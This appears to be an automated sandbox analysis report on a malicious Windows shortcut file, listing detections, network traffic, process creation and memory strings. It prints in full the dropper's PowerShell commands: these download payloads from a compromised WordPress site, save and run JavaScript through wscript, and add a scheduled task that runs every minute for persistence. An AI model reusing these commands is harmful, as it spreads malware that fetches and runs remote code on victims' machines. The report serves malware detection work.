$NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ProcessId: 4508, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T09:14:06.557964+010028033053Unknown Traffic192.168.2.54970546.254.34.201443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: 6K2g0GMmIE.lnkReversingLabs: Detection: 41%
      Source: 6K2g0GMmIE.lnkVirustotal: Detection: 42%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.0% probability
      Machine Learning detection for sample
      Source: 6K2g0GMmIE.lnkJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49932 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 46.254.34.201:443
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.italialife24.it
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A248D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A2486C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B815D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227302A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919976D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://italialife24.it
      Source: powershell.exe, 00000000.00000002.2107635804.0000017A333D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107635804.0000017A33291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A24B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B9007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B818DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227305A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273ED47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273EE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A8205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A833B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000011.00000002.3282767455.00000191983BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A23221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272ECD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019198191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A24979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.0000022730313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919979A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000011.00000002.3282767455.00000191983BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A248D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A2486C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B815D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227302A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919976D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.2111274276.0000017A3B51E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
      Source: powershell.exe, 00000000.00000002.2111274276.0000017A3B51E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.pki/
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A23221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272ECD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019198191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000011.00000002.3282767455.00000191983BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A24012000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B80C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272F94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019198DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000005.00000002.2226302807.0000015BEE229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsl
      Source: powershell.exe, 00000000.00000002.2107635804.0000017A333D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107635804.0000017A33291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A24B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B9007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B818DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227305A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273ED47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273EE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A8205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A833B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A24979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.0000022730313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919979A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A24979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.0000022730313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919979A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A24867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A248B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272F94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.00000191994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.2110160163.0000017A3B2E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/
      Source: wscript.exe, wscript.exe, 00000010.00000002.3254605213.000002BB948D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content
      Source: wscript.exe, 00000008.00000002.2180873696.0000015ECF725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/upl
      Source: wscript.exe, 0000000B.00000002.2650036491.0000027F6D7D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/0
      Source: wscript.exe, 00000004.00000002.2109915224.000002F284885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phgD
      Source: powershell.exe, 00000011.00000002.3280339972.0000019196480000.00000004.00000020.00020000.00000000.sdmp, 7Jb5KYoTpe8IWE.js.0.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
      Source: powershell.exe, 0000000C.00000002.2815454106.0000022746CF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3405145543.00000191B03B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A2492D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2111906771.0000017A3B5D0000.00000004.00000020.00020000.00000000.sdmp, 6K2g0GMmIE.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
      Source: powershell.exe, 00000000.00000002.2087400712.0000017A21365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
      Source: wscript.exe, 0000000F.00000002.2726788303.0000025C693B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2726045005.0000025C6763C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2725383858.0000025C6762C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726570779.0000025C67650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726393847.0000025C67575000.00000004.00000020.00020000.00000000.sdmp, M77M75P1ZQW1.js.5.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
      Source: powershell.exe, 00000000.00000002.2087677827.0000017A2492D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2111906771.0000017A3B5D0000.00000004.00000020.00020000.00000000.sdmp, 6K2g0GMmIE.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
      Source: powershell.exe, 00000000.00000002.2087400712.0000017A21365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
      Source: wscript.exe, 0000000F.00000002.2726788303.0000025C693B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2726045005.0000025C6763C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2725383858.0000025C6762C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726570779.0000025C67650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726393847.0000025C67575000.00000004.00000020.00020000.00000000.sdmp, M77M75P1ZQW1.js.5.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.5:49932 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 4508, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
      Windows shortcut file (LNK) contains suspicious command line arguments
      Source: 6K2g0GMmIE.lnkLNK file: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: Process Memory Space: powershell.exe PID: 4508, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.expl.evad.winLNK@24/13@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwyqdzms.fyk.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 6K2g0GMmIE.lnkReversingLabs: Detection: 41%
      Source: 6K2g0GMmIE.lnkVirustotal: Detection: 42%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
